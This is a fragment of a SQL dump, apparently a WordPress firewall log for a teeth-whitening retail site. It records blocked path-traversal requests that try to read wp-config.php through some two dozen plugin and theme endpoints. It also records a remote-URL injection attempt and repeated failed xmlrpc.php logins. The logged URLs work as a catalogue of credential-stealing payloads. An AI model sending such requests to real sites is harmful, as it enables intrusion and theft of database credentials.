Scripting','{\"learningMode\":0,\"failedRules\":\"136\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tzd3BfdXJsXQ==\",\"paramValue\":\"aHR0cHM6Ly9oYXN0ZWJpbi5jb20vcmF3L2V0b25pcHVzaWo=\",\"path\":\"L3dwLWFkbWluL2FkbWluLXBvc3QucGhw\",\"category\":\"xss\",\"ssl\":1}'),(7844,1629477051.207341,1629477051.021800,'\0\0\0\0\0\0\0\0\0\0��1\"��',0,403,0,0,0,'https://teethwhiteningproduct.co.uk/wp-admin/admin-ajax.php?action=kbslider_show_image&img=..%2Fwp-config.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0','blocked:waf','Directory Traversal - wp-config.php','{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tpbWdd\",\"paramValue\":\"Li4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWFkbWluL2FkbWluLWFqYXgucGhw\",\"category\":\"lfi\",\"ssl\":1}'),(7845,1629477051.185094,1629477050.994700,'\0\0\0\0\0\0\0\0\0\0��1\"��',0,403,0,0,0,'https://teethwhiteningproduct.co.uk/wp-admin/admin-ajax.php?action=cpabc_appointments_calendar_update&cpabc_calendar_update=1&id=..%2F..%2F..%2F..%2F..%2F..%2Fwp-config.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0','blocked:waf','Directory Traversal - wp-config.php','{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tpZF0=\",\"paramValue\":\"Li4vLi4vLi4vLi4vLi4vLi4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWFkbWluL2FkbWluLWFqYXgucGhw\",\"category\":\"lfi\",\"ssl\":1}'),(7846,1629477050.812984,1629477050.669900,'\0\0\0\0\0\0\0\0\0\0��1\"��',0,403,0,0,0,'https://teethwhiteningproduct.co.uk/wp-admin/admin-ajax.php?action=ave_publishPost&title=random&short=1&term=1&thumb=..%2Fwp-config.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0','blocked:waf','Directory Traversal - wp-config.php','{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1t0aHVtYl0=\",\"paramValue\":\"Li4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWFkbWluL2FkbWluLWFqYXgucGhw\",\"category\":\"lfi\",\"ssl\":1}'),(7847,1629477050.661804,1629477050.535600,'\0\0\0\0\0\0\0\0\0\0��1\"��',0,403,0,0,0,'https://teethwhiteningproduct.co.uk/wp-admin/admin-ajax.php?action=revslider_show_image&img=..%2Fwp-config.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0','blocked:waf','Directory Traversal - wp-config.php','{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tpbWdd\",\"paramValue\":\"Li4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWFkbWluL2FkbWluLWFqYXgucGhw\",\"category\":\"lfi\",\"ssl\":1}'),(7848,1629477050.133550,1629477050.022100,'\0\0\0\0\0\0\0\0\0\0��1\"��',0,403,0,0,0,'https://teethwhiteningproduct.co.uk/wp-admin/admin-ajax.php?action=duplicator_download&file=..%2Fwp-config.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0','blocked:waf','Directory Traversal - wp-config.php','{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tmaWxlXQ==\",\"paramValue\":\"Li4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWFkbWluL2FkbWluLWFqYXgucGhw\",\"category\":\"lfi\",\"ssl\":1}'),(7849,1629477065.769027,1629477065.697200,'\0\0\0\0\0\0\0\0\0\0��1\"��',0,403,0,0,0,'https://teethwhiteningproduct.co.uk/wp-content/plugins/mac-dock-gallery/macdownload.php?albid=..%2F..%2F..%2Fwp-config.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0','blocked:waf','Directory Traversal - wp-config.php','{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1thbGJpZF0=\",\"paramValue\":\"Li4vLi4vLi4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9tYWMtZG9jay1nYWxsZXJ5L21hY2Rvd25sb2FkLnBocA==\",\"category\":\"lfi\",\"ssl\":1}'),(7850,1629477064.849981,1629477064.785700,'\0\0\0\0\0\0\0\0\0\0��1\"��',0,403,0,0,0,'https://teethwhiteningproduct.co.uk/wp-content/plugins/db-backup/download.php?file=..%2F..%2F..%2Fwp-config.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0','blocked:waf','Directory Traversal - wp-config.php','{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tmaWxlXQ==\",\"paramValue\":\"Li4vLi4vLi4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9kYi1iYWNrdXAvZG93bmxvYWQucGhw\",\"category\":\"lfi\",\"ssl\":1}'),(7851,1629477064.209191,1629477064.136600,'\0\0\0\0\0\0\0\0\0\0��1\"��',0,403,0,0,0,'https://teethwhiteningproduct.co.uk/wp-content/plugins/aspose-doc-exporter/aspose_doc_exporter_download.php?file=..%2F..%2F..%2Fwp-config.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0','blocked:waf','Directory Traversal - wp-config.php','{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tmaWxlXQ==\",\"paramValue\":\"Li4vLi4vLi4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9hc3Bvc2UtZG9jLWV4cG9ydGVyL2FzcG9zZV9kb2NfZXhwb3J0ZXJfZG93bmxvYWQucGhw\",\"category\":\"lfi\",\"ssl\":1}'),(7852,1629477063.484390,1629477063.416700,'\0\0\0\0\0\0\0\0\0\0��1\"��',0,403,0,0,0,'https://teethwhiteningproduct.co.uk/wp-content/plugins/ungallery/source_vuln.php?pic=..%2F..%2F..%2F..%2F..%2Fwp-config.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0','blocked:waf','Directory Traversal - wp-config.php','{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1twaWNd\",\"paramValue\":\"Li4vLi4vLi4vLi4vLi4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy91bmdhbGxlcnkvc291cmNlX3Z1bG4ucGhw\",\"category\":\"lfi\",\"ssl\":1}'),(7853,1629477063.045830,1629477062.980900,'\0\0\0\0\0\0\0\0\0\0��1\"��',0,403,0,0,0,'https://teethwhiteningproduct.co.uk/wp-content/plugins/wp-support-plus-responsive-ticket-system/includes/admin/downloadAttachment.php?path=..%2F..%2F..%2F..%2F..%2Fwp-config.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0','blocked:waf','Directory Traversal - wp-config.php','{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1twYXRoXQ==\",\"paramValue\":\"Li4vLi4vLi4vLi4vLi4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy93cC1zdXBwb3J0LXBsdXMtcmVzcG9uc2l2ZS10aWNrZXQtc3lzdGVtL2luY2x1ZGVzL2FkbWluL2Rvd25sb2FkQXR0YWNobWVudC5waHA=\",\"category\":\"lfi\",\"ssl\":1}'),(7854,1629477062.646566,1629477062.579100,'\0\0\0\0\0\0\0\0\0\0��1\"��',0,403,0,0,0,'https://teethwhiteningproduct.co.uk/wp-content/themes/mTheme-Unus/css/css.php?files=..%2F..%2F..%2F..%2Fwp-config.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0','blocked:waf','Directory Traversal - wp-config.php','{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tmaWxlc10=\",\"paramValue\":\"Li4vLi4vLi4vLi4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWNvbnRlbnQvdGhlbWVzL21UaGVtZS1VbnVzL2Nzcy9jc3MucGhw\",\"category\":\"lfi\",\"ssl\":1}'),(7855,1629477061.974418,1629477061.910400,'\0\0\0\0\0\0\0\0\0\0��1\"��',0,403,0,0,0,'https://teethwhiteningproduct.co.uk/wp-content/themes/NativeChurch/download/download.php?file=..%2F..%2F..%2F..%2Fwp-config.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0','blocked:waf','Directory Traversal - wp-config.php','{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tmaWxlXQ==\",\"paramValue\":\"Li4vLi4vLi4vLi4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWNvbnRlbnQvdGhlbWVzL05hdGl2ZUNodXJjaC9kb3dubG9hZC9kb3dubG9hZC5waHA=\",\"category\":\"lfi\",\"ssl\":1}'),(7856,1629477060.735551,1629477060.658100,'\0\0\0\0\0\0\0\0\0\0��1\"��',0,403,0,0,0,'https://teethwhiteningproduct.co.uk/wp-content/themes/churchope/lib/downloadlink.php?file=..%2F..%2F..%2F..%2Fwp-config.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0','blocked:waf','Directory Traversal - wp-config.php','{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tmaWxlXQ==\",\"paramValue\":\"Li4vLi4vLi4vLi4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWNvbnRlbnQvdGhlbWVzL2NodXJjaG9wZS9saWIvZG93bmxvYWRsaW5rLnBocA==\",\"category\":\"lfi\",\"ssl\":1}'),(7857,1629477059.908884,1629477059.844300,'\0\0\0\0\0\0\0\0\0\0��1\"��',0,403,0,0,0,'https://teethwhiteningproduct.co.uk/wp-content/plugins/tera-charts/charts/treemap.php?fn=..%2F..%2F..%2F..%2Fwp-config.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0','blocked:waf','Directory Traversal - wp-config.php','{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tmbl0=\",\"paramValue\":\"Li4vLi4vLi4vLi4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy90ZXJhLWNoYXJ0cy9jaGFydHMvdHJlZW1hcC5waHA=\",\"category\":\"lfi\",\"ssl\":1}'),(7858,1629477059.404818,1629477059.335600,'\0\0\0\0\0\0\0\0\0\0��1\"��',0,403,0,0,0,'https://teethwhiteningproduct.co.uk/wp-content/plugins/sniplets/modules/syntax_highlight.php?libpath=..%2F..%2F..%2F..%2Fwp-config.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0','blocked:waf','Directory Traversal - wp-config.php','{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tsaWJwYXRoXQ==\",\"paramValue\":\"Li4vLi4vLi4vLi4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9zbmlwbGV0cy9tb2R1bGVzL3N5bnRheF9oaWdobGlnaHQucGhw\",\"category\":\"lfi\",\"ssl\":1}'),(7859,1629477058.637810,1629477058.531600,'\0\0\0\0\0\0\0\0\0\0��1\"��',0,403,0,0,0,'https://teethwhiteningproduct.co.uk/wp-content/plugins/simple-image-manipulator/controller/download.php?filepath=..%2F..%2F..%2Fwp-config.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0','blocked:waf','Directory Traversal - wp-config.php','{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tmaWxlcGF0aF0=\",\"paramValue\":\"Li4vLi4vLi4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9zaW1wbGUtaW1hZ2UtbWFuaXB1bGF0b3IvY29udHJvbGxlci9kb3dubG9hZC5waHA=\",\"category\":\"lfi\",\"ssl\":1}'),(7860,1629477058.071815,1629477057.992500,'\0\0\0\0\0\0\0\0\0\0��1\"��',0,403,0,0,0,'https://teethwhiteningproduct.co.uk/wp-content/plugins/recent-backups/download-file.php?file_link=..%2F..%2F..%2Fwp-config.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0','blocked:waf','Directory Traversal - wp-config.php','{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tmaWxlX2xpbmtd\",\"paramValue\":\"Li4vLi4vLi4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9yZWNlbnQtYmFja3Vwcy9kb3dubG9hZC1maWxlLnBocA==\",\"category\":\"lfi\",\"ssl\":1}'),(7861,1629477057.166584,1629477057.101300,'\0\0\0\0\0\0\0\0\0\0��1\"��',0,403,0,0,0,'https://teethwhiteningproduct.co.uk/wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=..%2F..%2F..%2F..%2Fwp-config.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0','blocked:waf','Directory Traversal - wp-config.php','{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tteVBhdGhd\",\"paramValue\":\"Li4vLi4vLi4vLi4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9teWdhbGxlcnkvbXlmdW5jdGlvbnMvbXlnYWxsZXJ5YnJvd3Nlci5waHA=\",\"category\":\"lfi\",\"ssl\":1}'),(7862,1629477056.436052,1629477056.341400,'\0\0\0\0\0\0\0\0\0\0��1\"��',0,403,0,0,0,'https://teethwhiteningproduct.co.uk/wp-content/plugins/mini-mail-dashboard-widgetwp-mini-mail.php?abspath=..%2F..%2Fwp-config.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0','blocked:waf','Directory Traversal - wp-config.php','{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1thYnNwYXRoXQ==\",\"paramValue\":\"Li4vLi4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9taW5pLW1haWwtZGFzaGJvYXJkLXdpZGdldHdwLW1pbmktbWFpbC5waHA=\",\"category\":\"lfi\",\"ssl\":1}'),(7863,1629477055.871282,1629477055.789700,'\0\0\0\0\0\0\0\0\0\0��1\"��',0,403,0,0,0,'https://teethwhiteningproduct.co.uk/wp-content/plugins/google-mp3-audio-player/direct_download.php?file=..%2F..%2F..%2Fwp-config.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0','blocked:waf','Directory Traversal - wp-config.php','{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tmaWxlXQ==\",\"paramValue\":\"Li4vLi4vLi4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9nb29nbGUtbXAzLWF1ZGlvLXBsYXllci9kaXJlY3RfZG93bmxvYWQucGhw\",\"category\":\"lfi\",\"ssl\":1}'),(7864,1629477055.042553,1629477054.976900,'\0\0\0\0\0\0\0\0\0\0��1\"��',0,403,0,0,0,'https://teethwhiteningproduct.co.uk/wp-content/plugins/google-document-embedder/libs/pdf.php?fn=lol.pdf&file=..%2F..%2F..%2F..%2Fwp-config.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0','blocked:waf','Directory Traversal - wp-config.php','{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tmaWxlXQ==\",\"paramValue\":\"Li4vLi4vLi4vLi4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9nb29nbGUtZG9jdW1lbnQtZW1iZWRkZXIvbGlicy9wZGYucGhw\",\"category\":\"lfi\",\"ssl\":1}'),(7865,1629477054.195808,1629477054.130700,'\0\0\0\0\0\0\0\0\0\0��1\"��',0,403,0,0,0,'https://teethwhiteningproduct.co.uk/wp-content/plugins/cherry-plugin/admin/import-export/download-content.php?file=..%2F..%2F..%2F..%2F..%2Fwp-config.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0','blocked:waf','Directory Traversal - wp-config.php','{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tmaWxlXQ==\",\"paramValue\":\"Li4vLi4vLi4vLi4vLi4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9jaGVycnktcGx1Z2luL2FkbWluL2ltcG9ydC1leHBvcnQvZG93bmxvYWQtY29udGVudC5waHA=\",\"category\":\"lfi\",\"ssl\":1}'),(7866,1629477052.788618,1629477052.711800,'\0\0\0\0\0\0\0\0\0\0��1\"��',0,403,0,0,0,'https://teethwhiteningproduct.co.uk/wp-content/force-download.php?file=..%2Fwp-config.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0','blocked:waf','Directory Traversal - wp-config.php','{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tmaWxlXQ==\",\"paramValue\":\"Li4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWNvbnRlbnQvZm9yY2UtZG93bmxvYWQucGhw\",\"category\":\"lfi\",\"ssl\":1}'),(7867,1629477052.034138,1629477051.950800,'\0\0\0\0\0\0\0\0\0\0��1\"��',0,403,0,0,0,'https://teethwhiteningproduct.co.uk/wp-admin/admin.php?page=multi_metabox_listing&action=edit&id=..%2F..%2F..%2F..%2F..%2F..%2Fwp-config.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0','blocked:waf','Directory Traversal - wp-config.php','{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tpZF0=\",\"paramValue\":\"Li4vLi4vLi4vLi4vLi4vLi4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWFkbWluL2FkbWluLnBocA==\",\"category\":\"lfi\",\"ssl\":1}'),(7868,0.000000,1629477350.472999,'\0\0\0\0\0\0\0\0\0\0����O]',0,200,0,1,0,'https://teethwhiteningproduct.co.uk//xmlrpc.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36','loginFailValidUsername',NULL,NULL),(7869,0.000000,1629477351.168301,'\0\0\0\0\0\0\0\0\0\0����O]',0,200,0,1,0,'https://teethwhiteningproduct.co.uk//xmlrpc.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36','loginFailValidUsername',NULL,NULL),(7870,0.000000,1629477352.213290,'\0\0\0\0\0\0\0\0\0\0����O]',0,200,0,1,0,'https://teethwhiteningproduct.co.uk//xmlrpc.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36','loginFailValidUsername',NULL,NULL),(7871,0.000000,1629477354.877721,'\0\0\0\0\0\0\0\0\0\0����O]',0,200,0,1,0,'https://teethwhiteningproduct.co.uk//xmlrpc.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36','loginFailValidUsername',NULL,NULL),(7872,0.000000,1629477355.354817,'\0\0\0\0\0\0\0\0\0\0����O]',0,200,0,1,0,'https://teethwhiteningproduct.co.uk//xmlrpc.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36','loginFailValidUsername',NULL,NULL),(7873,0.000000,1629477357.020320,'\0\0\0\0\0\0\0\0\0\0����O]',0,200,0,1,0,'https://teethwhiteningproduct.co.uk//xmlrpc.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36','loginFailValidUsername',NULL,NULL),(7874,0.000000,1629477357.679985,'\0\0\0\0\0\0\0\0\0\0����O]',0,200,0,1,0,'https://teethwhiteningproduct.co.uk//xmlrpc.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36','loginFailValidUsername',NULL,NULL),(7875,0.000000,1629477359.072112,'\0\0\0\0\0\0\0\0\0\0����O]',0,200,0,1,0,'https://teethwhiteningproduct.co.uk//xmlrpc.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36','loginFailValidUsername',NULL,NULL),(7876,0.000000,1629477359.453782,'\0\0\0\0\0\0\0\0\0\0����O]',0,200,0,1,0,'https://teethwhiteningproduct.co.uk//xmlrpc.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36','loginFailValidUsername',NULL,NULL),(7877,0.000000,1629477361.512937,'\0\0\0\0\0\0\0\0\0\0����O]',0,200,0,1,0,'https://teethwhiteningproduct.co.uk//xmlrpc.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36','loginFailValidUsername',NULL,NULL),(7878,0.000000,1629477362.971845,'\0\0\0\0\0\0\0\0\0\0����O]',0,200,0,1,0,'https://teethwhiteningproduct.co.uk//xmlrpc.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36','loginFailValidUsername',NULL,NULL),(7879,0.000000,1629477365.714485,'\0\0\0\0\0\0\0\0\0\0����O]',0,200,0,1,0,'https://teethwhiteningproduct.co.uk//xmlrpc.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36','loginFailValidUsername',NULL,NULL),(7880,0.000000,1629477366.449805,'\0\0\0\0\0\0\0\0\0\0����O]',0,200,0,1,0,'https://teethwhiteningproduct.co.uk//xmlrpc.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36','loginFailValidUsername',NULL,NULL),(7881,0.000000,1629477367.706147,'\0\0\0\0\0\0\0\0\0\0����O]',0,200,0,1,0,'https://teethwhiteningproduct.co.uk//xmlrpc.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36','loginFailValidUsername',NULL,NULL),(7882,0.000000,1629477368.131611,'\0\0\0\0\0\0\0\0\0\0����O]',0,200,0,1,0,'https://teethwhiteningproduct.co.uk//xmlrpc.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36','loginFailValidUsername',NULL,NULL),(7883,0.000000,1629477369.551934,'\0\0\0\0\0\0\0\0\0\0����O]',0,200,0,1,0,'https://teethwhiteningproduct.co.uk//xmlrpc.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36','loginFailValidUsername',NULL,NULL),(7884,0.000000,1629477369.889998,'\0\0\0\0\0\0\0\0\0\0����O]',0,200,0,1,0,'https://teethwhiteningproduct.co.uk//xmlrpc.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36','loginFailValidUsername',NULL,NULL),(7885,0.000000,1629477371.280749,'\0\0\0\0\0\0\0\0\0\0����O]',0,200,0,1,0,'https://teethwhiteningproduct.co.uk//xmlrpc.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36','loginFailValidUsername',NULL,NULL),(7886,0.000000,1629477371.524191,'\0\0\0\0\0\0\0\0\0\0����O]',0,200,0,1,0,'https://teethwhiteningproduct.co.uk//xmlrpc.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36','loginFailValidUsername',NULL,NULL),(7887,0.000000,1629477372.926509,'\0\0\0\0\0\0\0\0\0\0����O]',0,503,0,0,0,'https://teethwhiteningproduct.co.uk//xmlrpc.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36','lockedOut','Exceeded the maximum number of login failures which is: 20. The last username they tried to sign in with was: \'admin\'',NULL),(7888,0.000000,1629478684.629543,'\0\0\0\0\0\0\0\0\0\0����q',0,200,0,1,0,'https://teethwhiteningproduct.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(7889,0.000000,1629478743.888822,'\0\0\0\0\0\0\0\0\0\0��_�+�',0,200,0,1,0,'https://teethwhiteningproduct.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36','loginFailValidUsername',NULL,NULL),(7890,0.000000,1629479424.540447,'\0\0\0\0\0\0\0\0\0\0���D��',0,200,0,1,0,'https://teethwhiteningproduct.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(7891,0.000000,1629480103.192751,'\0\0\0\0\0\0\0\0\0\0��O���',0,200,0,1,0,'https://teethwhiteningproduct.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(7892,0.000000,1629480714.963150,'\0\0\0\0\0\0\0\0\0\0��/jɆ',0,200,0,1,0,'https://teethwhiteningproduct.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(7893,0.000000,1629481202.884214,'\0\0\0\0\0\0\0\0\0\0��#�K�',0,200,0,1,0,'https://teethwhiteningproduct.co.uk//xmlrpc.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36','loginFailValidUsername',NULL,NULL),(7894,0.000000,1629481210.170649,'\0\0\0\0\0\0\0\0\0\0��#�K�',0,200,0,1,0,'https://teethwhiteningproduct.co.uk//xmlrpc.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36','loginFailValidUsername',NULL,NULL),(7895,0.000000,1629481217.502090,'\0\0\0\0\0\0\0\0\0\0��#�K�',0,200,0,1,0,'https://teethwhiteningproduct.co.uk//xmlrpc.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 